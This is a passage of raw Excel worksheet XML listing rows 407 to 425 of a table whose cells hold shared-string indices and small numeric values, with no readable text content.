      <c r="K407" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L407" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M407" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N407" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O407" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P407" s="12" t="s">
        <v>2775</v>
      </c>
      <c r="Q407" s="12">
        <v>2.6</v>
      </c>
      <c r="R407" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S407" s="12" t="s">
        <v>3276</v>
      </c>
      <c r="T407" s="12" t="s">
        <v>3277</v>
      </c>
      <c r="U407" s="12" t="s">
        <v>604</v>
      </c>
      <c r="V407" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W407" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X407" s="12">
        <v>5</v>
      </c>
      <c r="Y407" s="12" t="s">
        <v>3278</v>
      </c>
    </row>
    <row r="408" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A408" s="12">
        <v>1563</v>
      </c>
      <c r="B408" s="12" t="s">
        <v>28678</v>
      </c>
      <c r="C408" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D408" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E408" s="18" t="s">
        <v>31425</v>
      </c>
      <c r="F408" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G408" s="12" t="s">
        <v>3279</v>
      </c>
      <c r="H408" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I408" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J408" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K408" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L408" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M408" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N408" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O408" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P408" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q408" s="12">
        <v>2.6</v>
      </c>
      <c r="R408" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S408" s="12" t="s">
        <v>3280</v>
      </c>
      <c r="T408" s="12" t="s">
        <v>1790</v>
      </c>
      <c r="U408" s="12" t="s">
        <v>3281</v>
      </c>
      <c r="V408" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W408" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X408" s="12">
        <v>29</v>
      </c>
      <c r="Y408" s="12" t="s">
        <v>3282</v>
      </c>
    </row>
    <row r="409" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A409" s="12">
        <v>1564</v>
      </c>
      <c r="B409" s="12" t="s">
        <v>28679</v>
      </c>
      <c r="C409" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D409" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E409" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F409" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G409" s="12" t="s">
        <v>3283</v>
      </c>
      <c r="H409" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I409" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J409" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K409" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L409" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M409" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N409" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O409" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P409" s="12" t="s">
        <v>3194</v>
      </c>
      <c r="Q409" s="12">
        <v>2.6</v>
      </c>
      <c r="R409" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S409" s="12" t="s">
        <v>3284</v>
      </c>
      <c r="T409" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U409" s="12" t="s">
        <v>3285</v>
      </c>
      <c r="V409" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W409" s="12">
        <v>2068</v>
      </c>
      <c r="X409" s="12">
        <v>17</v>
      </c>
      <c r="Y409" s="12" t="s">
        <v>3286</v>
      </c>
    </row>
    <row r="410" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A410" s="12">
        <v>1566</v>
      </c>
      <c r="B410" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C410" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D410" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F410" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G410" s="12" t="s">
        <v>3288</v>
      </c>
      <c r="H410" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I410" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J410" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K410" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L410" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M410" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N410" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O410" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P410" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q410" s="12">
        <v>2.6</v>
      </c>
      <c r="R410" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S410" s="12" t="s">
        <v>3289</v>
      </c>
      <c r="T410" s="12" t="s">
        <v>3290</v>
      </c>
      <c r="U410" s="12" t="s">
        <v>3291</v>
      </c>
      <c r="V410" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W410" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X410" s="12">
        <v>0</v>
      </c>
      <c r="Y410" s="12" t="s">
        <v>3292</v>
      </c>
    </row>
    <row r="411" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A411" s="12">
        <v>1576</v>
      </c>
      <c r="B411" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C411" s="12" t="s">
        <v>28680</v>
      </c>
      <c r="D411" s="12" t="s">
        <v>28681</v>
      </c>
      <c r="F411" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G411" s="12" t="s">
        <v>3303</v>
      </c>
      <c r="H411" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I411" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J411" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K411" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L411" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M411" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N411" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O411" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P411" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q411" s="12">
        <v>2.6</v>
      </c>
      <c r="R411" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S411" s="12" t="s">
        <v>3304</v>
      </c>
      <c r="T411" s="12" t="s">
        <v>3305</v>
      </c>
      <c r="U411" s="12" t="s">
        <v>3306</v>
      </c>
      <c r="V411" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W411" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X411" s="12">
        <v>5</v>
      </c>
      <c r="Y411" s="12" t="s">
        <v>3307</v>
      </c>
    </row>
    <row r="412" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A412" s="12">
        <v>1578</v>
      </c>
      <c r="B412" s="12" t="s">
        <v>28682</v>
      </c>
      <c r="D412" s="12" t="s">
        <v>28683</v>
      </c>
      <c r="F412" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G412" s="12" t="s">
        <v>3308</v>
      </c>
      <c r="H412" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I412" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J412" s="12" t="s">
        <v>1461</v>
      </c>
      <c r="K412" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L412" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M412" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N412" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O412" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P412" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q412" s="12">
        <v>2.6</v>
      </c>
      <c r="R412" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S412" s="12" t="s">
        <v>3309</v>
      </c>
      <c r="T412" s="12" t="s">
        <v>3310</v>
      </c>
      <c r="U412" s="12" t="s">
        <v>3311</v>
      </c>
      <c r="V412" s="12" t="s">
        <v>1487</v>
      </c>
      <c r="W412" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X412" s="12">
        <v>1</v>
      </c>
      <c r="Y412" s="12" t="s">
        <v>3312</v>
      </c>
    </row>
    <row r="413" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A413" s="12">
        <v>1579</v>
      </c>
      <c r="B413" s="12" t="s">
        <v>28684</v>
      </c>
      <c r="C413" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D413" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E413" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F413" s="12" t="s">
        <v>29755</v>
      </c>
      <c r="G413" s="12" t="s">
        <v>3313</v>
      </c>
      <c r="H413" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I413" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J413" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K413" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L413" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M413" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N413" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O413" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P413" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q413" s="12">
        <v>2.6</v>
      </c>
      <c r="R413" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S413" s="12" t="s">
        <v>3314</v>
      </c>
      <c r="T413" s="12" t="s">
        <v>3315</v>
      </c>
      <c r="U413" s="12" t="s">
        <v>3316</v>
      </c>
      <c r="V413" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W413" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X413" s="12">
        <v>11</v>
      </c>
      <c r="Y413" s="12" t="s">
        <v>3317</v>
      </c>
    </row>
    <row r="414" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A414" s="12">
        <v>1581</v>
      </c>
      <c r="B414" s="12" t="s">
        <v>28669</v>
      </c>
      <c r="C414" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D414" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E414" s="18" t="s">
        <v>31425</v>
      </c>
      <c r="F414" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G414" s="12" t="s">
        <v>3318</v>
      </c>
      <c r="H414" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I414" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J414" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K414" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L414" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M414" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N414" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O414" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P414" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q414" s="12">
        <v>2.6</v>
      </c>
      <c r="R414" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S414" s="12" t="s">
        <v>3319</v>
      </c>
      <c r="T414" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U414" s="12" t="s">
        <v>3320</v>
      </c>
      <c r="V414" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W414" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X414" s="12">
        <v>26</v>
      </c>
      <c r="Y414" s="12" t="s">
        <v>3321</v>
      </c>
    </row>
    <row r="415" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A415" s="12">
        <v>1583</v>
      </c>
      <c r="B415" s="12" t="s">
        <v>28685</v>
      </c>
      <c r="D415" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F415" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G415" s="12" t="s">
        <v>3322</v>
      </c>
      <c r="H415" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I415" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J415" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K415" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L415" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M415" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N415" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O415" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P415" s="12" t="s">
        <v>3287</v>
      </c>
      <c r="Q415" s="12">
        <v>2.6</v>
      </c>
      <c r="R415" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S415" s="12" t="s">
        <v>3323</v>
      </c>
      <c r="T415" s="12" t="s">
        <v>1576</v>
      </c>
      <c r="U415" s="12" t="s">
        <v>3324</v>
      </c>
      <c r="V415" s="12" t="s">
        <v>19</v>
      </c>
      <c r="W415" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X415" s="12">
        <v>6</v>
      </c>
      <c r="Y415" s="12" t="s">
        <v>3325</v>
      </c>
    </row>
    <row r="416" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A416" s="12">
        <v>1586</v>
      </c>
      <c r="B416" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C416" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D416" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E416" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F416" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G416" s="12" t="s">
        <v>3326</v>
      </c>
      <c r="H416" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I416" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J416" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K416" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L416" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M416" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N416" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O416" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P416" s="12" t="s">
        <v>3327</v>
      </c>
      <c r="Q416" s="12">
        <v>2.6</v>
      </c>
      <c r="R416" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S416" s="12" t="s">
        <v>3328</v>
      </c>
      <c r="T416" s="12" t="s">
        <v>335</v>
      </c>
      <c r="U416" s="12" t="s">
        <v>3329</v>
      </c>
      <c r="V416" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W416" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X416" s="12">
        <v>4</v>
      </c>
      <c r="Y416" s="12" t="s">
        <v>3330</v>
      </c>
    </row>
    <row r="417" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A417" s="12">
        <v>1587</v>
      </c>
      <c r="B417" s="12" t="s">
        <v>28687</v>
      </c>
      <c r="D417" s="12" t="s">
        <v>28686</v>
      </c>
      <c r="E417" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F417" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G417" s="12" t="s">
        <v>3331</v>
      </c>
      <c r="H417" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I417" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J417" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K417" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L417" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M417" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N417" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O417" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P417" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q417" s="12">
        <v>2.6</v>
      </c>
      <c r="R417" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S417" s="12" t="s">
        <v>3332</v>
      </c>
      <c r="T417" s="12" t="s">
        <v>2858</v>
      </c>
      <c r="U417" s="12" t="s">
        <v>3333</v>
      </c>
      <c r="V417" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W417" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X417" s="12">
        <v>12</v>
      </c>
      <c r="Y417" s="12" t="s">
        <v>3334</v>
      </c>
    </row>
    <row r="418" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A418" s="12">
        <v>1591</v>
      </c>
      <c r="B418" s="12" t="s">
        <v>28669</v>
      </c>
      <c r="C418" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D418" s="12" t="s">
        <v>28688</v>
      </c>
      <c r="F418" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G418" s="12" t="s">
        <v>3339</v>
      </c>
      <c r="H418" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I418" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J418" s="12" t="s">
        <v>319</v>
      </c>
      <c r="K418" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L418" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M418" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N418" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O418" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P418" s="12" t="s">
        <v>2907</v>
      </c>
      <c r="Q418" s="12">
        <v>2.6</v>
      </c>
      <c r="R418" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S418" s="12" t="s">
        <v>3340</v>
      </c>
      <c r="T418" s="12" t="s">
        <v>3249</v>
      </c>
      <c r="U418" s="12" t="s">
        <v>3341</v>
      </c>
      <c r="V418" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W418" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X418" s="12">
        <v>2</v>
      </c>
      <c r="Y418" s="12" t="s">
        <v>3342</v>
      </c>
    </row>
    <row r="419" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A419" s="12">
        <v>1597</v>
      </c>
      <c r="B419" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D419" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F419" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G419" s="12" t="s">
        <v>3347</v>
      </c>
      <c r="H419" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I419" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J419" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K419" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L419" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M419" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N419" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O419" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P419" s="12" t="s">
        <v>3348</v>
      </c>
      <c r="Q419" s="12">
        <v>2.6</v>
      </c>
      <c r="R419" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S419" s="12" t="s">
        <v>3349</v>
      </c>
      <c r="T419" s="12" t="s">
        <v>3350</v>
      </c>
      <c r="U419" s="12" t="s">
        <v>3351</v>
      </c>
      <c r="V419" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W419" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X419" s="12">
        <v>1</v>
      </c>
      <c r="Y419" s="12" t="s">
        <v>3352</v>
      </c>
    </row>
    <row r="420" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A420" s="12">
        <v>1607</v>
      </c>
      <c r="B420" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C420" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D420" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E420" s="18" t="s">
        <v>31448</v>
      </c>
      <c r="F420" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G420" s="12" t="s">
        <v>3354</v>
      </c>
      <c r="H420" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I420" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J420" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K420" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L420" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M420" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N420" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O420" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P420" s="12" t="s">
        <v>3355</v>
      </c>
      <c r="Q420" s="12">
        <v>2.4</v>
      </c>
      <c r="R420" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S420" s="12" t="s">
        <v>3356</v>
      </c>
      <c r="T420" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="U420" s="12" t="s">
        <v>3357</v>
      </c>
      <c r="V420" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W420" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X420" s="12">
        <v>38</v>
      </c>
      <c r="Y420" s="12" t="s">
        <v>3358</v>
      </c>
    </row>
    <row r="421" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A421" s="12">
        <v>1629</v>
      </c>
      <c r="B421" s="12" t="s">
        <v>28690</v>
      </c>
      <c r="C421" s="12" t="s">
        <v>28548</v>
      </c>
      <c r="D421" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F421" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G421" s="12" t="s">
        <v>3376</v>
      </c>
      <c r="H421" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I421" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J421" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K421" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L421" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M421" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N421" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O421" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P421" s="12" t="s">
        <v>3031</v>
      </c>
      <c r="Q421" s="12">
        <v>2.6</v>
      </c>
      <c r="R421" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S421" s="12" t="s">
        <v>3377</v>
      </c>
      <c r="T421" s="12" t="s">
        <v>3378</v>
      </c>
      <c r="U421" s="12" t="s">
        <v>3379</v>
      </c>
      <c r="V421" s="12" t="s">
        <v>2242</v>
      </c>
      <c r="W421" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X421" s="12">
        <v>1</v>
      </c>
      <c r="Y421" s="12" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="422" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A422" s="12">
        <v>1633</v>
      </c>
      <c r="B422" s="12" t="s">
        <v>28691</v>
      </c>
      <c r="D422" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E422" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F422" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G422" s="12" t="s">
        <v>3387</v>
      </c>
      <c r="H422" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I422" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J422" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K422" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L422" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M422" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N422" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O422" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P422" s="12" t="s">
        <v>3366</v>
      </c>
      <c r="Q422" s="12">
        <v>2.4</v>
      </c>
      <c r="R422" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S422" s="12" t="s">
        <v>3388</v>
      </c>
      <c r="T422" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U422" s="12" t="s">
        <v>3108</v>
      </c>
      <c r="V422" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W422" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X422" s="12">
        <v>2</v>
      </c>
      <c r="Y422" s="12" t="s">
        <v>3389</v>
      </c>
    </row>
    <row r="423" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A423" s="12">
        <v>1641</v>
      </c>
      <c r="B423" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C423" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D423" s="12" t="s">
        <v>28692</v>
      </c>
      <c r="E423" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F423" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G423" s="12" t="s">
        <v>3396</v>
      </c>
      <c r="H423" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I423" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J423" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K423" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L423" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M423" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N423" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O423" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P423" s="12" t="s">
        <v>3022</v>
      </c>
      <c r="Q423" s="12">
        <v>2.4</v>
      </c>
      <c r="R423" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S423" s="12" t="s">
        <v>3397</v>
      </c>
      <c r="T423" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U423" s="12" t="s">
        <v>3398</v>
      </c>
      <c r="V423" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W423" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X423" s="12">
        <v>18</v>
      </c>
      <c r="Y423" s="12" t="s">
        <v>3400</v>
      </c>
    </row>
    <row r="424" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A424" s="12">
        <v>1642</v>
      </c>
      <c r="B424" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C424" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D424" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F424" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G424" s="12" t="s">
        <v>3401</v>
      </c>
      <c r="H424" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I424" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J424" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K424" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L424" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M424" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N424" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O424" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P424" s="12">
        <v>2.6</v>
      </c>
      <c r="Q424" s="12">
        <v>2.6</v>
      </c>
      <c r="R424" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S424" s="12" t="s">
        <v>3402</v>
      </c>
      <c r="T424" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U424" s="12" t="s">
        <v>3403</v>
      </c>
      <c r="V424" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W424" s="12" t="s">
        <v>3404</v>
      </c>
      <c r="X424" s="12">
        <v>7</v>
      </c>
      <c r="Y424" s="12" t="s">
        <v>3405</v>
      </c>
    </row>
    <row r="425" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A425" s="12">
        <v>1661</v>
      </c>
      <c r="B425" s="12" t="s">
        <v>28693</v>
      </c>
      <c r="D425" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E425" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F425" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G425" s="12" t="s">
        <v>3419</v>
      </c>
      <c r="H425" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I425" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J425" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K425" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L425" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M425" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N425" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O425" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P425" s="12">
        <v>2.6</v>
      </c>
      <c r="Q425" s="12">
        <v>2.6</v>
      </c>
      <c r="R425" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S425" s="12" t="s">
        <v>3420</v>
      </c>
      <c r="T425" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U425" s="12" t="s">
        <v>3421</v>
      </c>
      <c r="V425" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W425" s="12">
        <v>1801</v>
      </c>
      <c r="X425" s="12">
        <v>16</v>
      </c>
      <c r="Y425" s="12" t="s">
        <v>3422</v>
      </c>
    </row>
    <row r="426" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
